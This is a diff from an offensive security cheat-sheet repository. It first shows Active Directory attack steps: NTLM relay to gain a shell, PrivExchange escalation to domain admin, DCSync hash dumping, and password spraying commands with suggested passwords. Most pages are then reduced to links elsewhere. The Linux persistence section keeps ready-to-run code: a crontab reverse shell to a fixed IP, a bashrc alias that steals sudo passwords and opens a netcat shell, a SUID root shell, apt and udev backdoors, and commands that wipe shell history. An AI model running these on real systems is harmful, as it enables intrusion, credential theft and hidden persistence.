 If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
 1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
 2. Run `python  RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
 3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
 4. Wait for a shell
 ### Dangerous Built-in Groups Usage
 AdminSDHolder
 ```powershell
 Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
 Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
 or
 ([adsisearcher]"(AdminCount=1)").findall()
 ```
 ### Trust relationship between domains
 ```powershell
 nltest /trusted_domains
 ```
 or
 ```powershell
 ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
 SourceName          TargetName                    TrustType      TrustDirection
 ----------          ----------                    ---------      --------------
 domainA.local      domainB.local                  TreeRoot       Bidirectional
 ```
 ### PrivExchange attack
 Exchange your privileges for Domain Admin privs by abusing Exchange.
 You need a shell on a user account with a mailbox.
 1. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server.
    ```bash
    # https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
    python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx
    # https://github.com/G0ldenGunSec/PowerPriv 
    powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
    ```
 2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
 3. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
    ```bash
    python secretsdump.py xxxxxxxxxx -just-dc
    ```
 Alternatively you can use the Metasploit module 
 [`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
 ### Password spraying
 Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. 
 > The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. 
 Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
 ```powershell
 root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
 root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
 ```
 Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
 ```powershell
 crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
 ```
 Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
 ```powershell
 python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
 ```
 Using [hydra]() and [ncrack]() to target RDP services.
 ```powershell
 hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
 ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
 ```
 Most of the time the best passwords to spray are :
 - Password1
 - Welcome1
 - $Companyname1
 ## References
 * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
 * [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)
 * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
 * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
 * [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
 * [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
 * [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html)
 * [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html)
 * [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/)
 * [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/)
 * [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/)
 * [Pen Testing Active Directory Environments - Part III:  Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/)
 * [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/)
 * [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
 * [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
 * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
 * [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
 * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
 * [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/)
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/)
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/)
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/)
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
 * [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
 * [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
 * [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
 * [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/)
 * [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/)
 * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
 * [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
 * [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/)
 * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
 * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
 * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
 * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
 * [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
 * [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
 * [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)
--- a/Resources/Bind
+++ b/Resources/Bind
@@ -0,0 +1,13 @@
 # Bind Shell
 :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/shell-bind](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/)
 * [Perl](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#perl)
 * [Python](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#python)
 * [PHP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#php)
 * [Ruby](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#ruby)
 * [Netcat Traditional](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#netcat-traditional)
 * [Netcat OpenBsd](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#netcat-openbsd)
 * [Ncat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#ncat)
 * [Socat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#socat)
 * [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#powershell)
--- a/Resources/Cloud
+++ b/Resources/Cloud
@@ -0,0 +1,17 @@
 # Cloud - AWS 
 :warning: Content of this page has been moved to [InternalAllTheThings/cloud/aws](https://github.com/swisskyrepo/InternalAllTheThings/)
 * [Cloud - AWS](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/AWS%20Pentest/)
 * [AWS - Access Token & Secrets](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/)
 * [AWS - Service - Cognito](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-cognito/)
 * [AWS - Service - DynamoDB](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-dynamodb/)
 * [AWS - Service - EC2](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ec2/)
 * [AWS - Enumerate](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-enumeration/)
 * [AWS - Identity & Access Management](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-iam/)
 * [AWS - IOC & Detections](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ioc-detection/)
 * [AWS - Service - Lambda](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-lambda/)
 * [AWS - Metadata SSRF](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-metadata/)
 * [AWS - Service - S3 Buckets](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-s3-bucket/)
 * [AWS - Service - SSM](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ssm/)
 * [AWS - Training](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-training/)
--- a/Resources/Cloud
+++ b/Resources/Cloud
@@ -0,0 +1,12 @@
 # Cloud - Azure
 :warning: Content of this page has been moved to [InternalAllTheThings/cloud/azure](https://github.com/swisskyrepo/InternalAllTheThings/)
 * [Azure AD Connect](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-ad-connect/)
 * [Azure AD Enumerate](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-enumeration/)
 * [Azure AD IAM](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-devices-users-sp/)
 * [Azure AD Phishing](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/)
 * [Azure AD Tokens](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-access-and-token/)
 * [Azure Persistence](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-persistence/)
 * [Azure Requirements](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-requirements/)
 * [Azure Services](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-services/)
--- a/Resources/Cobalt
+++ b/Resources/Cobalt
@@ -0,0 +1,32 @@
 # Cobalt Strike
 :warning: Content of this page has been moved to [InternalAllTheThings/command-control/cobalt-strike](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/)
 * [Infrastructure](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#infrastructure)
    * [Redirectors](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#redirectors)
    * [Domain fronting](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#domain-fronting)
 * [OpSec](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#opsec)
    * [Customer ID](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#customer-id)
 * [Payloads](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#payloads)
    * [DNS Beacon](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#dns-beacon)
    * [SMB Beacon](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#smb-beacon)
    * [Metasploit compatibility](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#metasploit-compatibility)
    * [Custom Payloads](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#custom-payloads)
 * [Malleable C2](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#malleable-c2)
 * [Files](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#files)
 * [Powershell and .NET](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#powershell-and-net)
    * [Powershell commabds](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#powershell-commands)
    * [.NET remote execution](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#net-remote-execution)
 * [Lateral Movement](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#lateral-movement)
 * [VPN & Pivots](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#vpn--pivots)
 * [Kits](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#kits)
    * [Elevate Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#elevate-kit)
    * [Persistence Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#persistence-kit)
    * [Resource Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#resource-kit)
    * [Artifact Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#artifact-kit)
    * [Mimikatz Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#mimikatz-kit)
    * [Sleep Mask Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#sleep-mask-kit)
    * [Thread Stack Spoofer](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#thread-stack-spoofer)
 * [Beacon Object Files](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#beacon-object-files)
 * [NTLM Relaying via Cobalt Strike](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#ntlm-relaying-via-cobalt-strike)
 * [References](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#references)
--- a/Resources/Container
+++ b/Resources/Container
@@ -0,0 +1,14 @@
 # Container - Docker
 :warning: Content of this page has been moved to [InternalAllTheThings/containers/docker](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/)
 - [Tools](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#tools)
 - [Mounted Docker Socket](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#mounted-docker-socket)
 - [Open Docker API Port](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#open-docker-api-port)
 - [Insecure Docker Registry](#insecure-docker-registry)
 - [Exploit privileged container abusing the Linux cgroup v1](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#exploit-privileged-container-abusing-the-linux-cgroup-v1)
    - [Abusing CAP_SYS_ADMIN capability](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#abusing-capsysadmin-capability)
    - [Abusing coredumps and core_pattern](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#abusing-coredumps-and-corepattern)
 - [Breaking out of Docker via runC](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#breaking-out-of-docker-via-runc)
 - [Breaking out of containers using a device file](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#breaking-out-of-containers-using-a-device-file)
 - [References](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#references)
--- a/Resources/Container
+++ b/Resources/Container
@@ -0,0 +1,9 @@
 # Container - Kubernetes
 :warning: Content of this page has been moved to [InternalAllTheThings/containers/kubernetes/](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/)
 - [Tools](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#tools)
 - [Exploits](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#exploits)
    - [Accessible kubelet on 10250/TCP](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#accessible-kubelet-on-10250tcp)
    - [Obtaining Service Account Token](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#obtaining-service-account-token)
 - [References](#references)
--- a/Resources/Escape
+++ b/Resources/Escape
@@ -0,0 +1,16 @@
 # Application Escape and Breakout
 :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/escape-breakout](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/)
 * [Gaining a command shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#gaining-a-command-shell)
 * [Sticky Keys](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#sticky-keys)
 * [Dialog Boxes](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#dialog-boxes)
    * [Creating new files](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#creating-new-files)
    * [Open a new Windows Explorer instance](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#open-a-new-windows-explorer-instance)
    * [Exploring Context Menus](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#exploring-context-menus)
    * [Save as](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#save-as)
    * [Input Boxes](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#input-boxes)
    * [Bypass file restrictions](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#bypass-file-restrictions)
 * [Internet Explorer](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#internet-explorer)
 * [Shell URI Handlers](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#shell-uri-handlers)
 * [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#references)
--- a/Resources/HTML
+++ b/Resources/HTML
@@ -0,0 +1,6 @@
 # HTML Smuggling
 :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/html-smuggling](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/)
 - [Description](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/#description)
 - [Executable Storage](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/#executable-storage)
--- a/Resources/Hash
+++ b/Resources/Hash
@@ -0,0 +1,15 @@
 # Hash Cracking
 :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/hash-cracking](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/)
 * [Hashcat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#hashcat)
   * [Hashcat Example Hashes](https://hashcat.net/wiki/doku.php?id=example_hashes)
   * [Hashcat Install](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#hashcat-install)
   * [Mask attack](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#mask-attack)
   * [Dictionary](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#dictionary)
 * [John](https://github.com/openwall/john)
   * [Usage](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#john-usage)
 * [Rainbow tables](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#rainbow-tables)
 * [Tips and Tricks](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#tips-and-tricks)
 * [Online Cracking Resources](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#online-cracking-resources)
 * [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#references)
--- a/Resources/Initial
+++ b/Resources/Initial
@@ -0,0 +1,11 @@
 # Initial Access
 :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/initial-access](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/)
 * [Complex Chains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#complex-chains)
 * [Container](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#container)
 * [Payload](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#payload)
    * [Binary Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#binary-files)
    * [Code Execution Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#code-execution-files)
    * [Embedded Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#embedded-files)
 * [Code Signing](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#code-signing)
--- a/Resources/Linux
+++ b/Resources/Linux
@@ -0,0 +1,8 @@
 # Linux - Evasion
 :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/initial-access](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/)
 - [File names](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#file-names)
 - [Command history](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#command-history)
 - [Hiding text](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#hiding-text)
 - [Timestomping](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#timestomping)
--- a/Resources/Linux
+++ b/Resources/Linux
@@ -1,164 +1,18 @@
 # Linux - Persistence
-## Summary
+:warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/linux-persistence](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/)
-* [Basic reverse shell](#basic-reverse-shell)
+* [Basic reverse shell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#basic-reverse-shell)
-* [Add a root user](#add-a-root-user)
+* [Add a root user](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#add-a-root-user)
-* [Suid Binary](#suid-binary)
+* [Suid Binary](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#suid-binary)
-* [Crontab - Reverse shell](#crontab-reverse-shell)
+* [Crontab - Reverse shell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#crontab---reverse-shell)
-* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
+* [Backdooring a user's bash_rc](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-users-bash_rc)
-* [Backdooring a startup service](#backdoor-a-startup-service)
+* [Backdooring a startup service](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-startup-service)
-* [Backdooring a user startup file](#backdooring-an-user-startup-file)
+* [Backdooring a user startup file](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-user-startup-file)
-* [Backdooring a driver](#backdooring-a-driver)
+* [Backdooring Message of the Day](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-message-of-the-day)
-* [Backdooring the APT](#backdooring-the-apt)
+* [Backdooring a driver](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-driver)
-* [Backdooring the SSH](#backdooring-the-ssh)
+* [Backdooring the APT](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-the-apt)
-* [Tips](#tips)
+* [Backdooring the SSH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-the-ssh)
-* [References](#references)
+* [Backdooring Git](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-git)
-
+* [Additional Linux Persistence Options](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#additional-persistence-options)
-
+* [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#references)
 ## Basic reverse shell
 ```bash
 ncat --udp -lvp 4242
 ncat --sctp -lvp 4242
 ncat --tcp -lvp 4242
 ```
 ## Add a root user
 ```powershell
 sudo useradd -ou 0 -g 0 john
 sudo passwd john
 echo "linuxpassword" | passwd --stdin john
 ```
 ## Suid Binary
 ```powershell
 TMPDIR2="/var/tmp"
 echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
 gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
 rm $TMPDIR2/croissant.c
 chown root:root $TMPDIR2/croissant
 chmod 4777 $TMPDIR2/croissant
 ```
 ## Crontab - Reverse shell
 ```bash
 (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
 ```
 ## Backdooring a user's bash_rc 
 (FR/EN Version)
 ```bash
 TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
 cat << EOF > /tmp/$TMPNAME2
  alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale  = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale  = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
 EOF
 if [ -f ~/.bashrc ]; then
    cat /tmp/$TMPNAME2 >> ~/.bashrc
 fi
 if [ -f ~/.zshrc ]; then
    cat /tmp/$TMPNAME2 >> ~/.zshrc
 fi
 rm /tmp/$TMPNAME2
 ```
 ## Backdooring a startup service
 ```bash
 RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
 sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
 ```
 ## Backdooring a user startup file
 Linux, write a file in  `~/.config/autostart/NAME_OF_FILE.desktop`
 ```powershell
 In : ~/.config/autostart/*.desktop
 [Desktop Entry]
 Type=Application
 Name=Welcome
 Exec=/var/lib/gnome-welcome-tour
 AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
 OnlyShowIn=GNOME;
 X-GNOME-Autostart-enabled=false
 ```
 ## Backdooring a driver
 ```bash
 echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
 ```
 ## Backdooring the APT
 If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};`
 Next time "apt-get update" is done, your CMD will be executed!
 ```bash
 echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
 ```
 ## Backdooring the SSH
 Add an ssh key into the `~/.ssh` folder.
 1. `ssh-keygen`
 2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys`
 3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys
 ## Tips
 Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
 ```bash
 #[2J[2J[2J[2H[2A# Do not remove. Generated from /etc/issue.conf by configure.
 ```
 Clear the last line of the history.
 ```bash
 history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null
 ```
 Clear history
 ```bash
 [SPACE] ANY COMMAND
 or
 export HISTSIZE=0
 export HISTFILESIZE=0
 unset HISTFILE; CTRL-D
 or
 kill -9 $$
 or
 echo "" > ~/.bash_history
 or
 rm ~/.bash_history -rf
 or
 history -c
 or
 ln /dev/null ~/.bash_history -sf
 ```
 The following directories are temporary and usually writeable
 ```bash
 /var/tmp/
